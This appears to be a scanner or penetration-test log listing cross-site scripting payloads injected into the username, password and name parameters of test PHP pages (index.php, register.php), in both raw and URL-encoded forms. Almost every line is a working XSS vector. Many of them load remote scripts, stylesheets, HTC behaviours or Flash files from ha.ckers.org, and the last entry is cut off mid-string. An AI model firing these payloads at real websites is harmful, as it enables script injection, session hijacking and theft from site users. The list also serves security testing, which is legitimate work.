/test/website/register.php?username=exp%2F%2A%3CXSS+STYLE%3D%27no%5Cxss%3Anoxss%28%22%2A%2F%2F%2A%22%29%3B+xss%3A%26%23101%3Bx%26%23x2F%3B%2AXSS%2A%2F%2F%2A%2F%2A%2Fpression%28alert%28%22XSS%22%29%29%27%3E&password2=exp%2F%2A%3CXSS+STYLE%3D%27no%5Cxss%3Anoxss%28%22%2A%2F%2F%2A%22%29%3B+xss%3A%26%23101%3Bx%26%23x2F%3B%2AXSS%2A%2F%2F%2A%2F%2A%2Fpression%28alert%28%22XSS%22%29%29%27%3E&password=exp%2F%2A%3CXSS+STYLE%3D%27no%5Cxss%3Anoxss%28%22%2A%2F%2F%2A%22%29%3B+xss%3A%26%23101%3Bx%26%23x2F%3B%2AXSS%2A%2F%2F%2A%2F%2A%2Fpression%28alert%28%22XSS%22%29%29%27%3E&name=exp%2F%2A%3CXSS+STYLE%3D%27no%5Cxss%3Anoxss%28%22%2A%2F%2F%2A%22%29%3B+xss%3A%26%23101%3Bx%26%23x2F%3B%2AXSS%2A%2F%2F%2A%2F%2A%2Fpression%28alert%28%22XSS%22%29%29%27%3E&
/test/website/register.php?password=<META+HTTP-EQUIV="refresh"+CONTENT="0;+URL=http://;URL=javascript:alert('XSS');">
/test/website/register.php?password=exp%2F%2A%3CXSS+STYLE%3D%27no%5Cxss%3Anoxss%28%22%2A%2F%2F%2A%22%29%3B+xss%3A%26%23101%3Bx%26%23x2F%3B%2AXSS%2A%2F%2F%2A%2F%2A%2Fpression%28alert%28%22XSS%22%29%29%27%3E
/test/website/register.php?password=<IMG+SRC="jav&#x0A;ascript:alert('XSS');">
/test/website/?username=%3CEMBED+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.swf%22+AllowScriptAccess%3D%22always%22%3E%3C%2FEMBED%3E
/test/website/?name=%3CSCRIPT+SRC%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E
/test/website/index.php?password=%3CIMG+SRC+%3D+%22+j+a+v+a+s+c+r+i+p+t+%3A+a+l+e+r+t+%28+%27+X+S+S+%27+%29+%22+%3E
/test/website/index.php?username=%3CXML+ID%3DI%3E%3CX%3E%3CC%3E%3C%21%5BCDATA%5B%3CIMG+SRC%3D%22javas%5D%5D%3E%3C%21%5BCDATA%5Bcript%3Aalert%28%27XSS%27%29%3B%22%3E%5D%5D%3E+%3C%2FC%3E%3C%2FX%3E%3C%2Fxml%3E%3CSPAN+DATASRC%3D%23I+DATAFLD%3DC+DATAFORMATAS%3DHTML%3E
/test/website/?name=%3CIMG+SRC%3D%26%23x6A%26%23x61%26%23x76%26%23x61%26%23x73%26%23x63%26%23x72%26%23x69%26%23x70%26%23x74%26%23x3A%26%23x61%26%23x6C%26%23x65%26%23x72%26%23x74%26%23x28%26%23x27%26%23x58%26%23x53%26%23x53%26%23x27%26%23x29%3E
/test/website/register.php?password=%3CTABLE%3E%3CTD+BACKGROUND%3D%22javascript%3Aalert%28%27XSS%27%29%22%3E%3C%2FTD%3E%3C%2FTABLE%3E
/test/website/index.php?password=%3CIMG+SRC%3D%22jav+ascript%3Aalert%28%27XSS%27%29%3B%22%3E
/test/website/?username=exp/*<XSS+STYLE='no\xss:noxss("*//*");+xss:&#101;x&#x2F;*XSS*//*/*/pression(alert("XSS"))'>&password=exp/*<XSS+STYLE='no\xss:noxss("*//*");+xss:&#101;x&#x2F;*XSS*//*/*/pression(alert("XSS"))'>&name=exp/*<XSS+STYLE='no\xss:noxss("*//*");+xss:&#101;x&#x2F;*XSS*//*/*/pression(alert("XSS"))'>&
/test/website/register.php?password=<IMG+SRC="mocha:[code]">
/test/website/?password=<LINK+REL="stylesheet"+HREF="javascript:alert('XSS');">
/test/website/index.php?password=<XSS+STYLE="behavior:+url(http://ha.ckers.org/xss.htc);">
/test/website/index.php?password=%3CIMG+DYNSRC%3D%22javascript%3Aalert%28%27XSS%27%29%3B%22%3E
/test/website/?name=<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
/test/website/?username=<IMG+DYNSRC="javascript:alert('XSS');">
/test/website/register.php?password=%3CSCRIPT+a%3D%22%3E%27%3E%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E
/test/website/index.php?password=%3CIMG+SRC%3DJaVaScRiPt%3Aalert%28%27XSS%27%29%3E
/test/website/?username=<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>
/test/website/index.php?name=<META+HTTP-EQUIV="Set-Cookie"+Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">
/test/website/?username=<A+HREF="http://ha.ckers.org@google">XSS</A>
/test/website/?name=<INPUT+TYPE="IMAGE"+SRC="javascript:alert('XSS');">
/test/website/index.php?password=<SCRIPT+a=">"+SRC="http://ha.ckers.org/xss.js"></SCRIPT>
/test/website/index.php?name=<A+HREF="http://66.102.7.147/">XSS</A>
/test/website/index.php?name=<A+HREF="http://google:ha.ckers.org">XSS</A>
/test/website/?password=<TABLE+BACKGROUND="javascript:alert('XSS')"></TABLE>
/test/website/?password=<META+HTTP-EQUIV="Link"+Content="<http://ha.ckers.org/xss.css>;+REL=stylesheet">
/test/website/?password=%3CIMG+SRC%3DJaVaScRiPt%3Aalert%28%27XSS%27%29%3E
/test/website/index.php?name=%3C+%253C+%26lt+%26lt%3B+%26LT+%26LT%3B+%26%2360+%26%23060+%26%230060+%26%2300060+%26%23000060+%26%230000060+%26%2360%3B+%26%23060%3B+%26%230060%3B+%26%2300060%3B+%26%23000060%3B+%26%230000060%3B+%26%23x3c+%26%23x03c+%26%23x003c+%26%23x0003c+%26%23x00003c+%26%23x000003c+%26%23x3c%3B+%26%23x03c%3B+%26%23x003c%3B+%26%23x0003c%3B+%26%23x00003c%3B+%26%23x000003c%3B+%26%23X3c+%26%23X03c+%26%23X003c+%26%23X0003c+%26%23X00003c+%26%23X000003c+%26%23X3c%3B+%26%23X03c%3B+%26%23X003c%3B+%26%23X0003c%3B+%26%23X00003c%3B+%26%23X000003c%3B+%26%23x3C+%26%23x03C+%26%23x003C+%26%23x0003C+%26%23x00003C+%26%23x000003C+%26%23x3C%3B+%26%23x03C%3B+%26%23x003C%3B+%26%23x0003C%3B+%26%23x00003C%3B+%26%23x000003C%3B+%26%23X3C+%26%23X03C+%26%23X003C+%26%23X0003C+%26%23X00003C+%26%23X000003C+%26%23X3C%3B+%26%23X03C%3B+%26%23X003C%3B+%26%23X0003C%3B+%26%23X00003C%3B+%26%23X000003C%3B+%5Cx3c+%5Cx3C+%5Cu003c+%5Cu003C
/test/website/?username=<!--[if+gte+IE+4]>+<SCRIPT>alert('XSS');</SCRIPT>+<![endif]-->
/test/website/register.php?password=exp%2F%2A%3CXSS+STYLE%3D%27no%5Cxss%3Anoxss%28%22%2A%2F%2F%2A%22%29%3B+xss%3A%26%23101%3Bx%26%23x2F%3B%2AXSS%2A%2F%2F%2A%2F%2A%2Fpression%28alert%28%22XSS%22%29%29%27%3E
/test/website/register.php?password2=%3CIFRAME+SRC%3D%22javascript%3Aalert%28%27XSS%27%29%3B%22%3E%3C%2FIFRAME%3E
/test/website/?name=%3CMETA+HTTP-EQUIV%3D%22Set-Cookie%22+Content%3D%22USERID%3D%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E%22%3E
/test/website/register.php?username=%3CA+HREF%3D%22%2F%2Fgoogle%22%3EXSS%3C%2FA%3E
/test/website/index.php?username=perl+-e+%27print+%22%3CIMG+SRC%3Djava%00script%3Aalert%28%22XSS%22%29%3E%22%3B%27%3E+out
/test/website/index.php?password=<IMG+SRC=`javascript:alert("RSnake+says,+'XSS'")`>
/test/website/register.php?password=<FRAMESET><FRAME+SRC="javascript:alert('XSS');"></FRAMESET>
/test/website/index.php?name=<IMG+SRC+=+"+j+a+v+a+s+c+r+i+p+t+:+a+l+e+r+t+(+'+X+S+S+'+)+"+>
/test/website/register.php?password2=<META+HTTP-EQUIV="Set-Cookie"+Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">
/test/website/?username=<XML+ID=I><X><C><![CDATA[<IMG+SRC="javas]]><![CDATA[cript:alert('XSS');">]]>+</C></X></xml><SPAN+DATASRC=#I+DATAFLD=C+DATAFORMATAS=HTML>
/test/website/register.php?username=%3CXSS+STYLE%3D%22behavior%3A+url%28http%3A%2F%2Fha.ckers.org%2Fxss.htc%29%3B%22%3E&password2=%3CXSS+STYLE%3D%22behavior%3A+url%28http%3A%2F%2Fha.ckers.org%2Fxss.htc%29%3B%22%3E&password=%3CXSS+STYLE%3D%22behavior%3A+url%28http%3A%2F%2Fha.ckers.org%2Fxss.htc%29%3B%22%3E&name=%3CXSS+STYLE%3D%22behavior%3A+url%28http%3A%2F%2Fha.ckers.org%2Fxss.htc%29%3B%22%3E&
/test/website/register.php?name=%3CA+HREF%3D%22%2F%2Fgoogle%22%3EXSS%3C%2FA%3E
/test/website/index.php?password=<LAYER+SRC="http://ha.ckers.org/scriptlet.html"></LAYER>
/test/website/register.php?username=<A+HREF="http://ha.ckers.org@google">XSS</A>
/test/website/?name=%3CXML+ID%3DI%3E%3CX%3E%3CC%3E%3C%21%5BCDATA%5B%3CIMG+SRC%3D%22javas%5D%5D%3E%3C%21%5BCDATA%5Bcript%3Aalert%28%27XSS%27%29%3B%22%3E%5D%5D%3E+%3C%2FC%3E%3C%2FX%3E%3C%2Fxml%3E%3CSPAN+DATASRC%3D%23I+DATAFLD%3DC+DATAFORMATAS%3DHTML%3E
/test/website/?name=%3CBR+SIZE%3D%22%26%7Balert%28%27XSS%27%29%7D%22%3E
/test/website/index.php?username=%3CA+HREF%3D%22http%3A%2F%2F0x42.0x0000066.0x7.0x93%2F%22%3EXSS%3C%2FA%3E
/test/website/register.php?password2=<LAYER+SRC="http://ha.ckers.org/scriptlet.html"></LAYER>
/test/website/index.php?username=<A+HREF="http://0x42.0x0000066.0x7.0x93/">XSS</A>
/test/website/register.php?username=<STYLE>li+{list-style-image:+url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS
/test/website/register.php?password=%3CXML+ID%3D%22xss%22%3E%3CI%3E%3CB%3E%3CIMG+SRC%3D%22javas%3C%21--+--%3Ecript%3Aalert%28%27XSS%27%29%22%3E%3C%2FB%3E%3C%2FI%3E%3C%2FXML%3E+%3CSPAN+DATASRC%3D%22%23xss%22+DATAFLD%3D%22B%22+DATAFORMATAS%3D%22HTML%22%3E%3C%2FSPAN%3E
/test/website/index.php?username=exp%2F%2A%3CXSS+STYLE%3D%27no%5Cxss%3Anoxss%28%22%2A%2F%2F%2A%22%29%3B+xss%3A%26%23101%3Bx%26%23x2F%3B%2AXSS%2A%2F%2F%2A%2F%2A%2Fpression%28alert%28%22XSS%22%29%29%27%3E&password=exp%2F%2A%3CXSS+STYLE%3D%27no%5Cxss%3Anoxss%28%22%2A%2F%2F%2A%22%29%3B+xss%3A%26%23101%3Bx%26%23x2F%3B%2AXSS%2A%2F%2F%2A%2F%2A%2Fpression%28alert%28%22XSS%22%29%29%27%3E&name=exp%2F%2A%3CXSS+STYLE%3D%27no%5Cxss%3Anoxss%28%22%2A%2F%2F%2A%22%29%3B+xss%3A%26%23101%3Bx%26%23x2F%3B%2AXSS%2A%2F%2F%2A%2F%2A%2Fpression%28alert%28%22XSS%22%29%29%27%3E&
/test/website/register.php?password2=%3CIMG+SRC%3Djavascript%3Aalert%28String.fromCharCode%2888%2C83%2C83%29%29%3E
/test/website/register.php?password2=<IFRAME+SRC=http://ha.ckers.org/scriptlet.html+<
/test/website/index.php?username=<SCRIPT+"a='>'"+SRC="http://ha.ckers.org/xss.js"></SCRIPT>&password=<SCRIPT+"a='>'"+SRC="http://ha.ckers.org/xss.js"></SCRIPT>&name=<SCRIPT+"a='>'"+SRC="http://ha.ckers.org/xss.js"></SCRIPT>&
/test/website/register.php?name=<IMG+SRC=JaVaScRiPt:alert('XSS')>
/test/website/register.php?username=%3CA+HREF%3D%22http%3A%2F%2F1113982867%2F%22%3EXSS%3C%2FA%3E
/test/website/?username=%3CBASE+HREF%3D%22javascript%3Aalert%28%27XSS%27%29%3B%2F%2F%22%3E&password=%3CBASE+HREF%3D%22javascript%3Aalert%28%27XSS%27%29%3B%2F%2F%22%3E&name=%3CBASE+HREF%3D%22javascript%3Aalert%28%27XSS%27%29%3B%2F%2F%22%3E&
/test/website/?password=\";alert('XSS');//
/test/website/index.php?username=<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>
/test/website/register.php?password2=<A+HREF="http://1113982867/">XSS</A>
/test/website/?username=%3C%2FTITLE%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%3C%2FSCRIPT%3E
/test/website/register.php?password2=%3CIFRAME+SRC%3Dhttp%3A%2F%2Fha.ckers.org%2Fscriptlet.html+%3C
/test/website/register.php?name=<IFRAME+SRC=http://ha.ckers.org/scriptlet.html+<
/test/website/?username=%3CBODY+BACKGROUND%3D%22javascript%3Aalert%28%27XSS%27%29%3B%22%3E
/test/website/index.php?password=%3CA+HREF%3D%22javascript%3Adocument.location%3D%27http%3A%2F%2Fwww.google.com%2F%27%22%3EXSS%3C%2FA%3E
/test/website/?username=perl+-e+'print+"<IMG+SRC=java script:alert("XSS")>";'>+out&password=perl+-e+'print+"<IMG+SRC=java script:alert("XSS")>";'>+out&name=perl+-e+'print+"<IMG+SRC=java script:alert("XSS")>";'>+out&
/test/website/index.php?password=%3CIMG+SRC%3D%60javascript%3Aalert%28%22RSnake+says%2C+%27XSS%27%22%29%60%3E
/test/website/register.php?password=<IMG+STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
/test/website/register.php?username=<OBJECT+classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param+name=url+value=javascript:alert('XSS')></OBJECT>&password2=<OBJECT+classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param+name=url+value=javascript:alert('XSS')></OBJECT>&password=<OBJECT+classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param+name=url+value=javascript:alert('XSS')></OBJECT>&name=<OBJECT+classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param+name=url+value=javascript:alert('XSS')></OBJECT>&
/test/website/register.php?username=<IMG+SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
/test/website/register.php?username=%3CSCRIPT+SRC%3D%2F%2Fha.ckers.org%2F.j%3E
/test/website/index.php?password=<OBJECT+TYPE="text/x-scriptlet"+DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>
/test/website/?name=<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
/test/website/index.php?name=%3CA+HREF%3D%22%2F%2Fgoogle%22%3EXSS%3C%2FA%3E
/test/website/index.php?username=<IMG+SRC="mocha:[code]">&password=<IMG+SRC="mocha:[code]">&name=<IMG+SRC="mocha:[code]">&
/test/website/register.php?password='';!--"<XSS>=&{()}
/test/website/?name=%3CIMG+SRC%3D%22+%26%2314%3B+javascript%3Aalert%28%27XSS%27%29%3B%22%3E
/test/website/index.php?username=%3CSTYLE%3EBODY%7B-moz-binding%3Aurl%28%22http%3A%2F%2Fha.ckers.org%2Fxssmoz.xml%23xss%22%29%7D%3C%2FSTYLE%3E&password=%3CSTYLE%3EBODY%7B-moz-binding%3Aurl%28%22http%3A%2F%2Fha.ckers.org%2Fxssmoz.xml%23xss%22%29%7D%3C%2FSTYLE%3E&name=%3CSTYLE%3EBODY%7B-moz-binding%3Aurl%28%22http%3A%2F%2Fha.ckers.org%2Fxssmoz.xml%23xss%22%29%7D%3C%2FSTYLE%3E&
/test/website/?username=%3CSCRIPT+a%3D%22%3E%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&password=%3CSCRIPT+a%3D%22%3E%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&name=%3CSCRIPT+a%3D%22%3E%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&
/test/website/index.php?password=%3CDIV+STYLE%3D%22background-image%3A+url%28%26%231%3Bjavascript%3Aalert%28%27XSS%27%29%29%22%3E
/test/website/?name=<A+HREF="http://google.com/">XSS</A>
/test/website/index.php?name=%3CBODY+onload%21%23%24%25%26%28%29%2A%7E%2B-_.%2C%3A%3B%3F%40%5B%2F%7C%5C%5D%5E%60%3Dalert%28%22XSS%22%29%3E
/test/website/register.php?name=%3CMETA+HTTP-EQUIV%3D%22Link%22+Content%3D%22%3Chttp%3A%2F%2Fha.ckers.org%2Fxss.css%3E%3B+REL%3Dstylesheet%22%3E
/test/website/register.php?username=%3CSCRIPT+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.jpg%22%3E%3C%2FSCRIPT%3E
/test/website/?password=%3CBODY+BACKGROUND%3D%22javascript%3Aalert%28%27XSS%27%29%3B%22%3E
/test/website/register.php?name=<SCRIPT+="blah"+SRC="http://ha.ckers.org/xss.js"></SCRIPT>
/test/website/?password=%3CHTML+xmlns%3Axss%3E+%3C%3Fimport+namespace%3D%22xss%22+implementation%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.htc%22%3E+%3Cxss%3Axss%3EXSS%3C%2Fxss%3Axss%3E+%3C%2FHTML%3E
/test/website/index.php?username=<SCRIPT+a=`>`+SRC="http://ha.ckers.org/xss.js"></SCRIPT>
/test/website/register.php?username=<BODY+onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>&password2=<BODY+onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>&password=<BODY+onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>&name=<BODY+onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>&
/test/website/register.php?password2=%3CSCRIPT+a%3D%22blah%22+%27%27+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E
/test/website/index.php?username=%3CXML+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxsstest.xml%22+ID%3DI%3E%3C%2FXML%3E+%3CSPAN+DATASRC%3D%23I+DATAFLD%3DC+DATAFORMATAS%3DHTML%3E%3C%2FSPAN%3E
/test/website/register.php?username=%3CA+HREF%3D%22%2F%2Fwww.google.com%2F%22%3EXSS%3C%2FA%3E
/test/website/register.php?name=%3CIMG+SRC%3D%22jav+ascript%3Aalert%28%27XSS%27%29%3B%22%3E
/test/website/register.php?username=%3CSCRIPT+a%3D%22blah%22+%27%27+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&password2=%3CSCRIPT+a%3D%22blah%22+%27%27+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&password=%3CSCRIPT+a%3D%22blah%22+%27%27+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&name=%3CSCRIPT+a%3D%22blah%22+%27%27+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&
/test/website/index.php?username=<IMG+SRC=JaVaScRiPt:alert('XSS')>
/test/website/register.php?password2=%3CA+HREF%3D%22h+tt+p%3A%2F%2F6%26%2309%3B6.000146.0x7.147%2F%22%3EXSS%3C%2FA%3E
/test/website/register.php?password2=<IMG+SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
/test/website/?password=<A+HREF="http://66.102.7.147/">XSS</A>
/test/website/index.php?password=%3CSCRIPT+%3D%22blah%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E
/test/website/index.php?username=<IMG+SRC="javascript:alert('XSS');">
/test/website/index.php?username=%5C%22%3Balert%28%27XSS%27%29%3B%2F%2F
/test/website/index.php?username=<SCRIPT+SRC=http://ha.ckers.org/xss.js
/test/website/index.php?username=%3CIMG+SRC%3D%22javascript%3Aalert%28%27XSS%27%29%22&password=%3CIMG+SRC%3D%22javascript%3Aalert%28%27XSS%27%29%22&name=%3CIMG+SRC%3D%22javascript%3Aalert%28%27XSS%27%29%22&
/test/website/?username=%3CA+HREF%3D%22http%3A%2F%2F%2577%2577%2577%252E%2567%256F%256F%2567%256C%2565%252E%2563%256F%256D%22%3EXSS%3C%2FA%3E&password=%3CA+HREF%3D%22http%3A%2F%2F%2577%2577%2577%252E%2567%256F%256F%2567%256C%2565%252E%2563%256F%256D%22%3EXSS%3C%2FA%3E&name=%3CA+HREF%3D%22http%3A%2F%2F%2577%2577%2577%252E%2567%256F%256F%2567%256C%2565%252E%2563%256F%256D%22%3EXSS%3C%2FA%3E&
/test/website/index.php?password=<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
/test/website/register.php?username=<STYLE+type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>&password2=<STYLE+type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>&password=<STYLE+type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>&name=<STYLE+type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>&
/test/website/index.php?username=%3CIMG+SRC%3Djavascript%3Aalert%28%26quot%3BXSS%26quot%3B%29%3E
/test/website/?username=%3CIMG+SRC%3D%22livescript%3A%5Bcode%5D%22%3E
/test/website/index.php?username=<FRAMESET><FRAME+SRC="javascript:alert('XSS');"></FRAMESET>
/test/website/register.php?username=%3CA+HREF%3D%22%2F%2Fwww.google.com%2F%22%3EXSS%3C%2FA%3E&password2=%3CA+HREF%3D%22%2F%2Fwww.google.com%2F%22%3EXSS%3C%2FA%3E&password=%3CA+HREF%3D%22%2F%2Fwww.google.com%2F%22%3EXSS%3C%2FA%3E&name=%3CA+HREF%3D%22%2F%2Fwww.google.com%2F%22%3EXSS%3C%2FA%3E&
/test/website/?name=<META+HTTP-EQUIV="refresh"+CONTENT="0;url=javascript:alert('XSS');">
/test/website/index.php?username=<IFRAME+SRC="javascript:alert('XSS');"></IFRAME>
/test/website/?username=<IFRAME+SRC=http://ha.ckers.org/scriptlet.html+<
/test/website/register.php?password=%3CLINK+REL%3D%22stylesheet%22+HREF%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.css%22%3E
/test/website/index.php?username=%3CEMBED+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.swf%22+AllowScriptAccess%3D%22always%22%3E%3C%2FEMBED%3E
/test/website/index.php?password=%3CHTML%3E%3CBODY%3E+%3C%3Fxml%3Anamespace+prefix%3D%22t%22+ns%3D%22urn%3Aschemas-microsoft-com%3Atime%22%3E+%3C%3Fimport+namespace%3D%22t%22+implementation%3D%22%23default%23time2%22%3E+%3Ct%3Aset+attributeName%3D%22innerHTML%22+to%3D%22XSS%3CSCRIPT+DEFER%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E%22%3E+%3C%2FBODY%3E%3C%2FHTML%3E
/test/website/register.php?username=<DIV+STYLE="background-image:+url(&#1;javascript:alert('XSS'))">
/test/website/register.php?username=<IMG+SRC="jav&#x09;ascript:alert('XSS');">&password2=<IMG+SRC="jav&#x09;ascript:alert('XSS');">&password=<IMG+SRC="jav&#x09;ascript:alert('XSS');">&name=<IMG+SRC="jav&#x09;ascript:alert('XSS');">&
/test/website/register.php?name=<SCRIPT+a="blah"+''+SRC="http://ha.ckers.org/xss.js"></SCRIPT>
/test/website/index.php?username=perl+-e+%27print+%22%26%3CSCR%00IPT%3Ealert%28%22XSS%22%29%3C%2FSCR%00IPT%3E%22%3B%27+%3E+out
/test/website/index.php?name=<XSS+STYLE="behavior:+url(http://ha.ckers.org/xss.htc);">
/test/website/?name=%3CSTYLE+TYPE%3D%22text%2Fjavascript%22%3Ealert%28%27XSS%27%29%3B%3C%2FSTYLE%3E
/test/website/?password=%3CIMG+SRC%3D%26%230000106%26%230000097%26%230000118%26%230000097%26%230000115%26%230000099%26%230000114%26%230000105%26%230000112%26%230000116%26%230000058%26%230000097%26%230000108%26%230000101%26%230000114%26%230000116%26%230000040%26%230000039%26%230000088%26%230000083%26%230000083%26%230000039%26%230000041%3E
/test/website/index.php?name=%3C%21--%5Bif+gte+IE+4%5D%3E+%3CSCRIPT%3Ealert%28%27XSS%27%29%3B%3C%2FSCRIPT%3E+%3C%21%5Bendif%5D--%3E
/test/website/index.php?name=%3CA+HREF%3D%22%2F%2Fwww.google.com%2F%22%3EXSS%3C%2FA%3E
/test/website/register.php?name=%3CDIV+STYLE%3D%22width%3A+expression%28alert%28%27XSS%27%29%29%3B%22%3E
/test/website/?username=%3CINPUT+TYPE%3D%22IMAGE%22+SRC%3D%22javascript%3Aalert%28%27XSS%27%29%3B%22%3E&password=%3CINPUT+TYPE%3D%22IMAGE%22+SRC%3D%22javascript%3Aalert%28%27XSS%27%29%3B%22%3E&name=%3CINPUT+TYPE%3D%22IMAGE%22+SRC%3D%22javascript%3Aalert%28%27XSS%27%29%3B%22%3E&
/test/website/index.php?name=%3CIMG+LOWSRC%3D%22javascript%3Aalert%28%27XSS%27%29%3B%22%3E
/test/website/register.php?name=<LINK+REL="stylesheet"+HREF="http://ha.ckers.org/xss.css">
/test/website/index.php?username=<META+HTTP-EQUIV="Link"+Content="<http://ha.ckers.org/xss.css>;+REL=stylesheet">&password=<META+HTTP-EQUIV="Link"+Content="<http://ha.ckers.org/xss.css>;+REL=stylesheet">&name=<META+HTTP-EQUIV="Link"+Content="<http://ha.ckers.org/xss.css>;+REL=stylesheet">&
/test/website/?username=<IFRAME+SRC="javascript:alert('XSS');"></IFRAME>&password=<IFRAME+SRC="javascript:alert('XSS');"></IFRAME>&name=<IFRAME+SRC="javascript:alert('XSS');"></IFRAME>&
/test/website/index.php?username=%3CXML+ID%3DI%3E%3CX%3E%3CC%3E%3C%21%5BCDATA%5B%3CIMG+SRC%3D%22javas%5D%5D%3E%3C%21%5BCDATA%5Bcript%3Aalert%28%27XSS%27%29%3B%22%3E%5D%5D%3E+%3C%2FC%3E%3C%2FX%3E%3C%2Fxml%3E%3CSPAN+DATASRC%3D%23I+DATAFLD%3DC+DATAFORMATAS%3DHTML%3E&password=%3CXML+ID%3DI%3E%3CX%3E%3CC%3E%3C%21%5BCDATA%5B%3CIMG+SRC%3D%22javas%5D%5D%3E%3C%21%5BCDATA%5Bcript%3Aalert%28%27XSS%27%29%3B%22%3E%5D%5D%3E+%3C%2FC%3E%3C%2FX%3E%3C%2Fxml%3E%3CSPAN+DATASRC%3D%23I+DATAFLD%3DC+DATAFORMATAS%3DHTML%3E&name=%3CXML+ID%3DI%3E%3CX%3E%3CC%3E%3C%21%5BCDATA%5B%3CIMG+SRC%3D%22javas%5D%5D%3E%3C%21%5BCDATA%5Bcript%3Aalert%28%27XSS%27%29%3B%22%3E%5D%5D%3E+%3C%2FC%3E%3C%2FX%3E%3C%2Fxml%3E%3CSPAN+DATASRC%3D%23I+DATAFLD%3DC+DATAFORMATAS%3DHTML%3E&
/test/website/register.php?name=%3CIMG+SRC+%3D+%22+j+a+v+a+s+c+r+i+p+t+%3A+a+l+e+r+t+%28+%27+X+S+S+%27+%29+%22+%3E
/test/website/index.php?username=%3CIMG+%22%22%22%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%22%3E
/test/website/index.php?name=%3CIMG+DYNSRC%3D%22javascript%3Aalert%28%27XSS%27%29%3B%22%3E
/test/website/?name=%3CSCRIPT+%22a%3D%27%3E%27%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E
/test/website/?username=<IMG+SRC="jav+ascript:alert('XSS');">
/test/website/?password=<IMG+SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
/test/website/register.php?name=%3CA+HREF%3D%22http%3A%2F%2F66.102.7.147%2F%22%3EXSS%3C%2FA%3E
/test/website/register.php?username=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E%3D%26%7B%7D&password2=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E%3D%26%7B%7D&password=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%22%3B